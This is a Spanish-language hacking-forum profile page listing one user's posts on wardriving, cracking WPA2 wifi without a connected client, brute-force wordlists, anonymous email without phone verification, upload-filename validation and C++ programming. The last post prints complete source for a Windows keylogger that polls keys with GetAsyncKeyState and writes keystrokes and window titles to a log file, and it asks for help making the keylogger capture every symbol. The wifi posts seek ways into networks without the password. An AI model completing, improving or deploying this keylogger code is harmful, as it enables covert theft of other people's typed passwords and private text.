elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: [1]
1  Sistemas Operativos / Windows / Podrían crear un post sobre Wardriving? en: 9 Junio 2020, 19:18 pm
Que tal,

Encontré mucho respecto al wifi hacking pero casi nada sobre el warDriving.
Podrían mencionar o recomendar que software, hardware, source code o metodologia se podría usar para dicha operación? algun tutorial o demo?

De antemano, gracias!
2  Seguridad Informática / Hacking Wireless / Hackear sin clientes conectados? en: 24 Mayo 2020, 00:32 am
Tengo un Router viejito que quiero volver a usar Modelo DPC3825 de Cisco el cual se que está funcionando.

Perdí la contraseña, solo recuerdo que empezaba "004XXXXXXX" con un total de 10 caracteres en total. Cifrado WPA2.

Quería volver a conectarme y detecto el SSID del Wifi "Mi-Wifi-Cisco" en las señales.

Para acceder quise conectarle un cable Ethernet pero al parecer las fichas hembra son decorativas. Descartada esa opción quise entrar por Aircrack con Crunch pero me di cuenta que para esta operación necesitas si o si un HANDSHAKE de un cliente conectado pero este no tiene ninguno.

Según la documentación de Aircrack y la leyenda o cuento de internet, se dice que aun sin clientes conectados es posible hackearlo.

Alguien sabe algo de esto?

3  Foros Generales / Dudas Generales / Me recomiendan algun Correo/Email para hackear? en: 18 Mayo 2020, 14:47 pm
Estoy enviando archivos escriptados desde una pc a otra via SMTP de Google.
Revisando las nuevas configuraciones de "seguridad" de Google, aun activando la casilla de permitir aplicaciones menos seguras loguearse o enviar correos estos no llegan.
Es como si Google tuviera un firewall o algo estúpido bloqueando mis envíos.

Me interesó lo que propone Protonmail, sin embargo el mail "gratis" no soporta SMTP, misma situación.

Alguno tiene algún mail no tan turbio como un onion pero confiable y que permita estos archivos? CLARAMENTE QUE NO PIDA TELÉFONO PARA CREAR CUENTA como yahoo, google, etc.
4  Programación / Desarrollo Web / Seguridad: Como puedo validar el filename en AJAX? en: 2 Diciembre 2019, 00:53 am
AYUDA!

Estamos trabajando en un módulo web de formulario utilizando dropzone (El clásico Drag and Drop files).
Nos prohibieron el uso de PHP por los riesgos e inseguridad que representa su uso.
En su reemplazo utilizamos ASP.NET con MVC, javascript, AJAX y mySQL.

Actualmente un simple AJAX hace el upload a la carpeta del servidor con un metodo POST.
Existen algunas validaciones que vienen incluidas en Dropzone como por ejemplo, el formato de imagenes o el tamaño:

Ejemplo:

Código:
    <script type="text/javascript">
        Dropzone.autoDiscover = false;

        $(document).ready(function () {

            $("div#myAwesomeDropzone").dropzone(
            {
                    paramName: "file",
                    maxFiles: 6,
                    maxFilesize: 1000, // MB
                    acceptedFiles: ".png,.jpg,.gif,.bmp,.jpeg",
                    addRemoveLinks: true,                   
             });
        });
     </script>

Sin embargo, nos asustamos al ver la gran vulnerabilidad e ineficacia contra Exploits de distintos tipos (unos 12 aproximadamente) manipulando simplemente el filename.

Cómo metodo de seguridad alternativo obfuscamos los codigos javascript, lo cual nos da tiempo.

Alguien podría recomendarme o mostrarme una validacion completa en AJAX para prevenir estos ataques?

Ataques:

https://www.owasp.org/index.php/Unrestricted_File_Upload
https://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation/
5  Seguridad Informática / Hacking Wireless / Diccionarios: Quiero saber la verdad en: 12 Noviembre 2019, 19:35 pm
Tenes tu pc y tu antena en modo monitor con aircrack, john o la aplicación que más te guste pero te diste cuenta que las claves de los routers van desde 10 a 14 caracteres alfanumericos (a-A-0).

--Cuenta la leyenda que hay diccionarios como (dark0de, rainbowtables,etc)--

 A lo que pregunto... Realmente son útiles?
 Es decir, en C/C++ encontré un código muy bueno, mis honores al autor "Arvind
 Kumar",
 donde se generan todas las claves posibles de 10 a 14 caracteres creando un archivo
 superior a los 1000 Terabytes  lo cual limitaría a cualquier mortal a poseer o manejar
 dicho archivo.lst

--Tipico noob preguntando estupideces, la clave se compone por hashes, ssid y bla bla bla.

 Debatible, yo creo que aplica a solo unos cuantos modelos, y varia según la marca (TP-
 LINK, CISCO, Huawei, etc).

En una situación hipotética que resolvemos el tema del manejo de listas, diría que se podría hackear lo que sea, pero entonces viene mi duda... Cómo lo hacen?

Que apps usan?
Cómo manejan tales diccionarios?
Libros?
Tutoriales?
Source Codes?

Antes que respondan, se que hay mucho por leer en esta página y cada día leo un poco más, pero una guía, una brújula en este mar de conocimiento nos ayuda a no ir a la deriva y evitar hundirnos en la desinformación.

Y a los mods o haters, vayanse al car@@@!! La información tiene que ser libre, de que sirve un foro si no es para compartir.




6  Programación / Desarrollo Web / Hacer grafico que se actualize desde la base de datos en: 16 Junio 2015, 18:34 pm
Hola !!

Tengo por un lado las bases de datos creadas en PHPMYADMIN:

y tengo los códigos de cómo hacer los gráficos con jpgraph.

Mi pregunta es cómo hacer la consulta a la base de datos para que el gràfico se actualize automáticamente cada ves que se ingresa un nuevo dato?

En el demo vienen los datos del gràfico cargados en un array. Nose como pasarle los datos de la base.
7  Programación / Desarrollo Web / HTML y PHP : Formulario de seleccion de listas que muestra resultados. en: 14 Mayo 2015, 16:29 pm
Con HTML y PHP :

Necesito crear un formulario con una LISTA que me permita seleccionar una opción entre:

"Noroeste, Cuyo, Litoral, Centro, Noreste y Patagonia"

Al seleccinar una, me tiene que ofrecer otra LISTA:

"provincia1 , provincia2 ,provincia3 "

La selección se hace mediante un "SUBMIT"

Y mostrar en una página tanto la zona como la provincia seleccionada.

Nota: Soy novato usando html y php. Se cómo armar el html con la primera lista, pero nose como hacer para que se despliegue la seguna al seleccionar una opcion ni que hacer con el php. Alguna ayuda?

8  Programación / Programación C/C++ / UNICODE ASCII C/C++ [Save in File] Ayuda ? en: 24 Noviembre 2014, 01:12 am
Que tal... llevo un tiempo estudiando este tema del Keylogging y con tiempo fui aprendiendo lo necesario para crear el mio.

Como era de esperar... no me iba a conformar con los Keylogger normales que rondan por la web y decidí subir la apuesta.

Desafortunadamente mis conocimientos llegaron a su limite y no existe mucha información al respecto de lo que pienso hacer.

Puras frustraciones al ver códigos con ejemplos incompletos, mal explicados o muy específicos. Respuestas como "Buscalo en Google" o incluso al ver que mis profesores no podían responderme mis preguntas.

En fin aquí va lo que quiero hacer:

Quiero grabar en un archivo de texto los caracteres y símbolos ASCII+UNICODE completos cuando se presione la tecla específica. (mejor dicho la combinación).

Suena simple pero NO LO ES.

Las primeras problemáticas que surgieron fueron:

Me resulta imposible declarar todos los VK_ en "#defines" ya que no encuentro una tabla completa (0x31...) Lo que complica la impresión de los mismos.

Me resulta imposible crear una manera de obtener posibilidades infinitas... Es decir...
Seguramente pensaste en hacer un for de 0 a 255 pero Si alguien apretara la combinación ALT+9999999999999999999999999999999... etc, el programa no lo reconocería.

IMPORTANTE: No utilizo Hooks, uso el GetAsyncKeyState  y el Int main()



Yo entiendo todo, pero si me explican con código, entiendo mejor.
9  Programación / Programación C/C++ / Dos programas (Manual y Automático) que no se cierren? [C/C++] en: 14 Noviembre 2014, 22:20 pm
Cómo hago para crear dor programas que realizen lo siguiente:

Abro el programa1... este se cierra automaticamente/manualmente y cuando está cerrado abre el programa2.

Se abre el programa2 que se cierra automaticamente/manualmente y cuando está cerrado abre el programa1...

Eso en un bucle infinito.

Sé como crear los archivos, pero cómo hago para que cuando se cierre me abra el otro?  :huh:
10  Programación / Programación C/C++ / Terminando el Keylogger en: 24 Septiembre 2014, 02:25 am
Que tal gente!

Estoy haciendo un keylogger en C++/CPP.

Tomé como influencias ciertos códigos que se han publicado en esta página pero por lo que veo nadie se detuvo a perfeccionar este pequeño keylogger. Lo cual me resulta un desperdicio de posibilidades y talento. (LEER AL FINAL DEL CODIGO)

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <time.h>

#define OK -32767

int main() {
   
    FILE *log; 
    HWND ventana;   
    time_t ltime;
    int tecla=0;
    int cont=0;
    char TVentana[500] = "";                     
    char Teclas[10240]=""; //      0  1      2          3          4  5          6  7  8              9       10
    char simbol[256][15] =/*0*/  {"","","[CliC-I]","[CliC-D]","","[CliC-C]","","","[Retroceder]","[TAB]","",
                          /*1*/      "","","[ENTER]","","","[SHIFT]","[CONTROL]","[ALT]","","[Mayusculas]",
                          /*2*/      "","","","","","","[Esc]","","","",
                          /*3*/      ""," ","[Re-Pag]","[Av-Pag]","","[Inicio]","[Izquierda]","[Arriba]","[Derecha]","[Abajo]",
                          /*4*/      "","","","[PrtSc]","[Insert]","[Supr]","","0","1","2",
                          /*5*/      "3","4","5","6","7","8","9","","","",
                          /*6*/      "","","","","a","b","c","d","e","f",
                          /*7*/      "g","h","i","j","k","l","m","n","o","p",
                          /*8*/      "q","r","s","t","u","v","w","x","y","z",
                          /*9*/      "[WIN-I]","[WIN-D]","[D-WIN]","","","0","1","2","3",
                          /*10*/     "4","5","6","7","8","9","*","+"," ","-",".",
                          /*11*/     "/","[F1]","[F2]","[F3]","[F4]","[F5]","[F6]","[F7]","[F8]","[F9]",
                          /*12*/     "[F10]","[F11]","[F12]"," "," "," "," "," "," "," ",
                          /*13*/     " "," "," "," "," "," "," "," "," "," "," ",
                          /*14*/     " "," ","[Bloq Num]"," "," "," "," "," "," ",
                          /*15*/     " "," "," "," "," "," "," "," "," ","[Shift-I]",
                          /*16*/     "[Shift-D]"," "," "," "," "," "," "," "," "," ",
                          /*17*/     " "," "," "," "," "," "," "," "," "," ",
                          /*18*/     " "," "," "," "," "," "," ",",","-",".",
                          /*19*/     " "," "," "," "," "," "," "," "," ",
                          /*20*/     " "," "," "," "," "," "," "," "," "," "," ",
                          /*21*/     " "," "," "," "," "," "," "," ","'","\\",
                          /*22*/     "¡","´" };
     
   log=fopen("log.log","a");
   fprintf(log,"\n/******************************/");
   fprintf(log,"\n/*
  • KeyLoGuer   */");
   fprintf(log,"\n/*
  • Iniciando...OK ");
   fprintf(log,"\n/******************************/");
   fclose(log);
           
   ventana=GetForegroundWindow();
   
   while(1) {
      if((GetForegroundWindow()!=ventana) || (cont==850)){
         if(strlen(TVentana)>0 && strlen(Teclas)>0) {
            time(&ltime);
            ctime(&ltime);

            log=fopen("log.log","a");
            fprintf(log,"\n\n
  • Fecha: %s",ctime(&ltime));
            fprintf(log,"
  • Ventana: %s ",TVentana);
            fprintf(log,"\n
  • Texto: %s",Teclas);
            fprintf(log,"\n ");
            fprintf(log,"\n/******************************/\n");
            fclose(log);

            free(Teclas);
            strcpy(Teclas,"");
            cont = 0;
            }
         ventana=GetForegroundWindow();
         }
      else {
           GetWindowText(ventana,TVentana,500);
           }
      for(tecla=4;tecla<256;tecla++) {
          if (GetAsyncKeyState(tecla)==OK) {
              strcat(Teclas,simbol[tecla]);
              printf(" %s \n" ,simbol[tecla]);
              cont++;
              }
          }
    }
}

Muy buen código y de todos los que vi buscando por internet fue el más simple y efectivo. De todas formas NINGUNO de estos keyloggers puede detectar todo el codigo ASCII.

Veamos un ejemplo mientras se ejecuta el programa: Si alguien teclea ALT+265 se crea el simbolo "○", Sin embargo en el .log solo se guarda ALT ALT ALT ... 

NINGUN KEYLOGGER HECHOS EN C++ HASTA AHORA RECONOCE TODA LA SIMBOLOGIA Y ESTO REQUIERE MEJORAS.

Por favor alguien sabe como completar el código? Es posible hacerlo en C++?
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines